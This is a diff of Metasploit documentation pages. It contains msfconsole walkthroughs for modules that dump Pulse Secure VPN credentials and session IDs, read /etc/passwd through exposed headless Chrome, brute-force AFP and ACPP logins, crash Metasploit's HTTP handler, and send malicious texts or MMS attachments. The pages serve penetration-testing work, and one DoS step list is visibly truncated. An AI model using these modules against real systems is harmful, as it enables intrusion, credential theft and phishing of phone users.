+[+] User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..
+[+] User 2004 named newuser4 in group unauthorized found with password hash $1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/.
+[+] SNMP community read with permissions read-only
+[+] SNMP community public with permissions read-only
+[+] SNMP community private with permissions read-write
+[+] SNMP community secretsauce with permissions read-write
+[+] SNMP community hello there with permissions read-write
+[+] radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV
+[+] PPTP username 'pap_username' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+### ScreenOS
+
+```
+root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/screenos.conf https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ssg5_screenos.conf
+root@metasploit-dev:~/metasploit-framework# ./msfconsole 
+
+[*] Starting persistent handler(s)...
+msf5 > use auxiliary/admin/juniper/gather/juniper_config
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set config /tmp/screenos.conf
+config => /tmp/screenos.conf
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set action SCREENOS
+action => SCREENOS
+msf5 auxiliary(admin/juniper/gather/juniper_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] Admin user netscreen found with password hash nKVUM2rwMUzPcrkG5sWIHdCtqkAibn
+[+] User 1 named testuser found with password hash auth. Enable permission: 02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/admin/scada/phoenix_command.md

@@ -64,7 +64,7 @@ msf auxiliary(phoenix_command) > run
 [*] Auxiliary module execution completed
 ```
 
-## Module Options
+## Options
 ```
 msf auxiliary(phoenix_command) > show options
 

documentation/modules/auxiliary/client/iec104/iec104.md

@@ -52,7 +52,7 @@ msf auxiliary(client/iec104/iec104) > set rhost 127.0.0.1
 rhost => 127.0.0.1
 msf auxiliary(client/iec104/iec104) > run
 
-[+] 127.0.0.1:2404 - Recieved STARTDT_ACT
+[+] 127.0.0.1:2404 - Received STARTDT_ACT
 [*] 127.0.0.1:2404 - Sending 104 command
 [+] 127.0.0.1:2404 -   Parsing response: Interrogation command (C_IC_NA_1)
 [+] 127.0.0.1:2404 -     TX: 0002 RX: 0000
@@ -77,7 +77,7 @@ msf auxiliary(client/iec104/iec104) > run
 [+] 127.0.0.1:2404 -     CauseTx: 0a (Termination Activation)
 [*] 127.0.0.1:2404 - operation ended
 [*] 127.0.0.1:2404 - Terminating Connection
-[+] 127.0.0.1:2404 - Recieved STOPDT_ACT
+[+] 127.0.0.1:2404 - Received STOPDT_ACT
 [*] Auxiliary module execution completed
 msf auxiliary(client/iec104/iec104) >
 ```
@@ -97,7 +97,7 @@ msf auxiliary(client/iec104/iec104) > set command_value 5
 command_value => 5
 msf auxiliary(client/iec104/iec104) > run
 
-[+] 127.0.0.1:2404 - Recieved STARTDT_ACT
+[+] 127.0.0.1:2404 - Received STARTDT_ACT
 [*] 127.0.0.1:2404 - Sending 104 command
 [+] 127.0.0.1:2404 -   Parsing response: Double command (C_DC_NA_1)
 [+] 127.0.0.1:2404 -     TX: 0002 RX: 0000
@@ -114,7 +114,7 @@ msf auxiliary(client/iec104/iec104) > run
 [+] 127.0.0.1:2404 -     IOA: 5 DCO: 0x05
 [*] 127.0.0.1:2404 - operation ended
 [*] 127.0.0.1:2404 - Terminating Connection
-[+] 127.0.0.1:2404 - Recieved STOPDT_ACT
+[+] 127.0.0.1:2404 - Received STOPDT_ACT
 [*] Auxiliary module execution completed
 msf auxiliary(client/iec104/iec104) >
 ```

documentation/modules/auxiliary/client/mms/send_mms.md

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
 collection of phone numbers of the same carrier.
 
 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.
 
-## Module Options
+## Options
 
 **CELLNUMBERS**
 
@@ -74,7 +76,7 @@ in order to receive the text, such as AT&T.
 
 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.
 
-## Supported Carrier Gateways
+### Supported Carrier Gateways
 
 The module supports the following carriers:
 
@@ -84,14 +86,14 @@ The module supports the following carriers:
 * Verizon
 * Google Fi
 
-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number
 
 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
 
 http://freecarrierlookup.com/
 
-## Gmail SMTP Example
+### Gmail SMTP Example
 
 Gmail is a popular mail server, so we will use this as a demonstration.
 
@@ -111,7 +113,7 @@ After creating the application password, configure auxiliary/client/mms/send_mms
 
 And you should be ready to go.
 
-## Yahoo SMTP Example
+### Yahoo SMTP Example
 
 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -136,7 +138,7 @@ After configuring your Yahoo account, configure auxiliary/client/mms/send_mms th
 
 And you're good to go.
 
-## Demonstration
+## Scenarios
 
 After setting up your mail server and the module, your output should look similar to this:
 

documentation/modules/auxiliary/client/sms/send_text.md

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
 of phone numbers of the same carrier.
 
 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.
 
-## Module Options
+## Options
 
 **CELLNUMBERS**
 
@@ -57,7 +59,7 @@ The password you use to log into the SMTP server.
 
 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.
 
-## Supported Carrier Gateways
+### Supported Carrier Gateways
 
 The module supports the following carriers:
 
@@ -73,7 +75,7 @@ The module supports the following carriers:
 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
 not supported.
 
-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number
 
 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
@@ -82,7 +84,7 @@ http://freecarrierlookup.com/
 
 **Note:** If the phone is using Google Fi, then it may appear as a different carrier.
 
-## Gmail SMTP Example
+### Gmail SMTP Example
 
 Gmail is a popular mail server, so we will use this as a demonstration.
 
@@ -100,7 +102,7 @@ After creating the application password, configure auxiliary/client/sms/send_tex
 
 And you should be ready to go.
 
-## Yahoo SMTP Example
+### Yahoo SMTP Example
 
 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -123,7 +125,7 @@ After configuring your Yahoo account, configure auxiliary/client/sms/send_text t
 
 And you're good to go.
 
-## Demonstration
+### Scenarios
 
 After setting up your mail server and the module, your output should look similar to this:
 

documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md

@@ -3,7 +3,7 @@ This module triggers a Denial of Service vulnerability in the Flexense Enterpris
 a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  
 
 
-## Vulnerable Application 
+## Verification Steps
 According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
 Following list of softwares are vulnerable to Denial Of Service.
 read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065

documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md

@@ -15,7 +15,7 @@ Vulnerable app versions include:
 
 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
 
-## Verification
+## Verification Steps
 
 1. Start msfconsole
 1. `use auxiliary/dos/http/ibm_lotus_notes.rb`

documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md

@@ -15,7 +15,7 @@ IBM Notes 8.5 release
 
 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 
 
-## Verification
+## Verification Steps
 
 Start msfconsole
 

documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md

@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+ Metasploit Framework before version 5.0.28
+
+## Verification Steps
+
+  1. Install Metasploit 5.0.27 or earlier (or checkout before commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b)
+  2. Start msfconsole with the target Metasploit instance and start any reverse_http/reverse_https listener
+  3. Start this module and set RHOSTS and RPORT to the target listener address and port.
+  4. Run the modulest <rhost>```
+  7. `msfconsole` should use 99%+ CPU for a varying amount of time depending on the DOSTYPE option. You may need to kill the process manually.
+
+## Options
+
+ **DOSTYPE**
+
+	GENTLE: *Current sessions will continue to work, but not future ones*
+	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+
+	SOFT: *No past or future sessions will work*
+      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+	HARD: *ReDOS or Catastrophic Regex Backtracking*
+	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+
+## Scenarios
+
+```
+msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:8080 - Sending DoS packet...
+^C[-] Stopping running againest current target...
+[*] Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/dos/http/webkitplus.md

@@ -55,7 +55,7 @@ at ../src/ephy-main.c line 432
 
 ```
 
-## Verification
+## Verification Steps
 
     Start msfconsole
     use auxiliary/dos/http/webkitplus

documentation/modules/auxiliary/gather/advantech_webaccess_creds.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 This module exploits three vulnerabilities in Advantech WebAccess.
 
@@ -12,9 +12,6 @@ The final vulnerability exploited is that the HTML Form on the user edit page co
 plain text password in the masked password input box. Typically the system should replace the
 actual password with a masked character such as "*".
 
-
-## Vulnerable Application
-
 Version 8.1 was tested during development:
 
 http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
@@ -41,7 +38,6 @@ The username to use to log into Advantech WebAccess. By default, there is a buil
 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.
 
-
-## Demo
+## Scenarios
 
 ![webaccess_steal_creds](https://cloud.githubusercontent.com/assets/1170914/22353246/34b2045e-e3e5-11e6-992c-f3ab9dcbe716.gif)

documentation/modules/auxiliary/gather/browser_getprivateip.md

@@ -4,7 +4,7 @@ This module retrieves a browser's network interface IP addresses using WebRTC. H
 
 Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html
 
-## Verification
+## Verification Steps
 
     Start msfconsole
     use auxiliary/gather/browser_lanipleak

documentation/modules/auxiliary/gather/censys_search.md

@@ -1,4 +1,7 @@
-The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+## Vulnerable Application
+
+The module use the Censys REST API to access the same data accessible through web interface.
+The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
 
 ## Verification Steps
 
@@ -207,8 +210,3 @@ msf auxiliary(censys_search) > run
 [+] wesecure.nl - [997423]
 [*] Auxiliary module execution completed
 ```
-
-
-## References
-
-1. https://censys.io/api

documentation/modules/auxiliary/gather/chrome_debugger.md

@@ -0,0 +1,46 @@
+# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
+
+This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
+
+## Headless Chrome Sessions
+	
+A vulnerable Headless Chrome session can be started with the following command:
+
+```
+$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
+```
+
+This will start a webserver running on port 9222 for all network interfaces.
+
+## Verification Steps
+	
+1. Start `msfconsole`
+2. Execute `auxiliary/gather/chrome_debugger`
+3. Execute `set RHOST $REMOTE_ADDRESS`
+4. Execute `set RPORT 9222`
+5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
+6. Execute `run`
+
+## Options
+
+* FILEPATH - The file path on the remote you wish to retrieve
+* URL - A URL you wish to fetch the contents of from the remote machine
+
+**Note:** One or the other must be set!
+
+## Example Run
+
+```
+[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
+[*] Opened connection
+[*] Attempting to load url file:///etc/passwd
+[*] Received Data
+[*] Sending request for data
+[*] Received Data
+[+] Retrieved resource
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.

documentation/modules/auxiliary/gather/kerberos_enumusers.md

@@ -9,7 +9,7 @@ accounts are enabled or disabled/locked out.
 To use kerberos_enumusers, make sure you are able to connect to the
 Kerberos service on a Domain Controller.
 
-## Scenario
+## Scenarios
 
 The following demonstrates basic usage, using a custom wordlist,
 targeting a single Domain Controller to identify valid domain user

documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 Nuuo CMS Session Bruteforce
 
@@ -49,8 +49,6 @@ Secondly, due to the nature of this application, it is normal to have the softwa
 
 It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 
 
-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)
 
  - 1.5.2 OK
@@ -73,9 +71,3 @@ msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_bruteforce) >
 ```
-
-## References
-
-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

documentation/modules/auxiliary/gather/nuuo_cms_file_download.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 Nuuo CMS Authenticated Arbitrary File Download
 
@@ -26,8 +26,6 @@ This module works in the following way:
 
 Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.
 
-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)
 
 The following versions were tested:
@@ -63,9 +61,3 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_file_download) >
 ```
-
-## References
-
-- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

documentation/modules/auxiliary/gather/office365userenum.md

@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 External python module compatible with v2 and v3.
 
 Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
@@ -14,9 +16,7 @@ Microsoft Security Response Center stated on 2017-06-28 that this issue does not
 
 This script is maintaing the ability to run independently of MSF.
 
-## Vulnerable Application
-
-  Office365's implementation of ActiveSync
+Office365's implementation of ActiveSync is vulnerable.
 
 ## Verification Steps
 
@@ -41,6 +41,7 @@ This script is maintaing the ability to run independently of MSF.
 
 
 ## Scenarios
+
 The following demonstrates basic usage, using the supplied users wordlist
 and default options.
 
@@ -72,6 +73,3 @@ grimhacker.com  ..        |
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
-
-## References
-https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md

@@ -0,0 +1,101 @@
+## Introduction
+
+This module exploits a pre-auth directory traversal in the Pulse Secure
+VPN server to dump an arbitrary file. Dumped files are stored in loot.
+
+If the `Automatic` action is set, plaintext and hashed credentials, as
+well as session IDs, will be dumped. Valid sessions can be hijacked by
+setting the `DSIG` browser cookie to a valid session ID.
+
+For the `Manual` action, please specify a file to dump via the `FILE`
+option. `/etc/passwd` will be dumped by default. If the `PRINT` option is
+set, file contents will be printed to the screen, with any unprintable
+characters replaced by a period.
+
+Please see related module exploit/linux/http/pulse_secure_cmd_exec for
+a post-auth exploit that can leverage the results from this module.
+
+## Actions
+
+```
+Name       Description
+----       -----------
+Automatic  Dump creds and sessions
+Manual     Dump an arbitrary file (FILE option)
+```
+
+## Options
+
+**FILE**
+
+Set this to the file you want to dump. The default is `/etc/passwd`.
+Valid only in manual mode.
+
+**PRINT**
+
+Whether to print file contents to the screen. Valid only in manual mode.
+
+## Usage
+
+Dumping creds and sessions in automatic mode:
+
+```
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
+[*] Running module against [redacted]
+
+[*] Running in automatic mode
+[*] Dumping /data/runtime/mtmp/lmdb/dataa/data.mdb
+[+] /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
+[*] Dumping /data/runtime/mtmp/lmdb/randomVal/data.mdb
+[*] Parsing session IDs...
+[+] Session ID found: df502e6052d9002d8f02160af8bfd055
+[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
+[+] Session ID found: acbef5625
+[+] Session ID found: c145e683a
+[+] Session ID found: fc6c097dd
+[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
+[+] Session ID found: c145e683a17cfacb72a47eb8b2515c14
+[+] Session ID found: a7661751393e16fa253e97bd02dc2a4f
+[+] Session ID found: 7e78ab276afea3f00dfa41892c437156c699eff8
+[+] /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
+[*] Dumping /data/runtime/mtmp/system
+[+] /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > loot
+
+Loot
+====
+
+host         service  type                                        name                                        content                   info                   path
+----         -------  ----                                        ----                                        -------                   ----                   ----
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/dataa/data.mdb      application/octet-stream  Plaintext credentials  /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/randomVal/data.mdb  application/octet-stream  Session IDs            /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/system                   application/octet-stream  Hashed credentials     /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin
+
+msf5 auxiliary(gather/pulse_secure_file_disclosure) >
+```
+
+Dumping default `/etc/passwd` in manual mode:
+
+```
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > set action Manual
+action => Manual
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
+[*] Running module against [redacted]
+
+[*] Running in manual mode
+[*] Dumping /etc/passwd
+root:x:0:0:root:/:/bin/bash
+nfast:x:0:0:nfast:/:/bin/bash
+bin:x:1:1:bin:/:
+nobody:x:99:99:Nobody:/:
+dns:x:98:98:DNS:/:
+term:x:97:97:Telnet/SSH:/:
+web80:x:96:96:Port 80 web:/:
+rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
+postgres:x:102:102:PostgreSQL User:/:
+
+[+] /Users/wvu/.msf4/loot/20191029222949_default_[redacted]_PulseSecureVPN_073170.bin
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/pulse_secure_file_disclosure) >
+```

documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md

@@ -1,10 +1,11 @@
-## Description
-This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
-
 ## Vulnerable Application
+
 This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 
+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
 ## Verification Steps
+
 1. Start `msfconsole -q`
 2. `use auxiliary/gather/samsung_browser_sop_bypass`
 3. `set SRVHOST`
@@ -14,6 +15,7 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 5. `run`
 
 ## Scenarios
+
 ```
 $ sudo msfconsole -q
 msf > use auxiliary/gather/samsung_browser_sop_bypass
@@ -49,8 +51,6 @@ host            origin          service          public          private
 msf auxiliary(samsung_browser_sop_bypass) >
 ```
 
-## Demos
-
 Working of MSF Module: `https://youtu.be/ulU98cWVhoI`
 
 Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`

documentation/modules/auxiliary/scanner/acpp/login.md

@@ -0,0 +1,28 @@
+## Vulnerable Application
+
+ACPP is an undocumented and proprietary Apple protocol found in Airport products which protects the credentials used to administer the device. This module attempts exploit a weak encryption mechanism (fixed XOR key) by brute forcing the password via a dictionary attack or specific password.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/acpp/login)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/acpp/login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Apple AirPort Extreme 802.11g
+
+  ```
+  msf > use auxiliary/scanner/acpp/login
+  msf auxiliary(scanner/acpp/login) > show options
+  msf auxiliary(scanner/acpp/login) > set RHOSTS 1.1.1.1
+      RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/acpp/login) > set PASSWORD myPassword
+      PASSWORD => myPassword
+  msf auxiliary(scanner/acpp/login) > run
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - Starting ACPP login sweep
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - ACPP Login Successful: myPassword
+  ```

documentation/modules/auxiliary/scanner/afp/afp_login.md

@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS. This module attempts to brute force authentication credentials for AFP.
+
+References:
+
+* [AFP_Reference](https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html)
+* [AFP_Security](https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html)
+
+### Kali 2019.3 Install Instructions
+
+1. `sudo apt-get install netatalk`
+2. edit `/etc/default/netatalk` and add the following lines:
+
+    ```
+    ATALKD_RUN=no
+    PAPD_RUN=no
+    CNID_METAD_RUN=yes
+    AFPD_RUN=yes
+    TIMELORD_RUN=no
+    A2BOOT_RUN=no
+    ```
+
+3. Restart the service: `sudo /etc/init.d/netatalk restart`
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/afp/afp_login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Kali Linux 2019.3 and Netatalk 3.1.12
+
+  ```
+  msf > use modules/auxiliary/scanner/afp/afp_login
+  msf auxiliary(scanner/afp/afp_login) > set USERNAME tuser
+  msf auxiliary(scanner/afp/afp_login) > set PASSWORD myPassword
+  msf auxiliary(scanner/afp/afp_login) > set RHOST 172.17.0.2
+  msf auxiliary(scanner/afp/afp_login) > run
+    [*] 172.17.0.2:548 - Scanning IP: 172.17.0.2
+    [*] 172.17.0.2:548 - Login Successful: tuser:myPassword
+  ```

documentation/modules/auxiliary/scanner/afp/afp_server_info.md

@@ -3,10 +3,11 @@
 Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS.  This module will gather information about the service.
 Netatalk is a Linux implementation of AFP.
 
-The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
-  
+The following was done on Ubuntu 16.04, and is largely based on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
+
   1. `sudo apt-get install netatalk`
   2. edit `/etc/default/netatalk` and add the following lines:
+
     ```
     ATALKD_RUN=no
     PAPD_RUN=no
@@ -15,6 +16,7 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
     TIMELORD_RUN=no
     A2BOOT_RUN=no
     ```
+
   3. Restart the service: `sudo /etc/init.d/netatalk restart`
 
 ## Verification Steps
@@ -22,40 +24,41 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
   1. Install and configure afp (or netatalk in a Linux environment)
   2. Start msfconsole
   3. Do: `auxiliary/scanner/afp/afp_server_info`
-  4. Do: `run`
+  4. Do: `set RHOSTS [ip]`
+  5. Do: `run`
 
 ## Scenarios
 
-  A run against the configuration from these docs
+### Ubuntu 16.04 with Netatalk 2.2.5
 
   ```
-  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info 
+  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info
   msf5 auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1
   rhosts => 1.1.1.1
   msf5 auxiliary(scanner/afp/afp_server_info) > run
-  
+
   [*] 1.1.1.1:548 - AFP 1.1.1.1 Scanning...
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548:548 AFP:
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548  UAMs: Cleartxt Passwrd, DHX2
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Signature: 975394e16633312406281959287fcbd9
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1
   [*] 1.1.1.1:548 - AFP 1.1.1.1:548   UTF8 Server Name: ubuntu
   [*] 1.1.1.1:548 - Scanned 1 of 1 hosts (100% complete)
   [*] Auxiliary module execution completed

documentation/modules/auxiliary/scanner/db2/db2_auth.md

@@ -0,0 +1,32 @@
+## Vulnerable Application
+
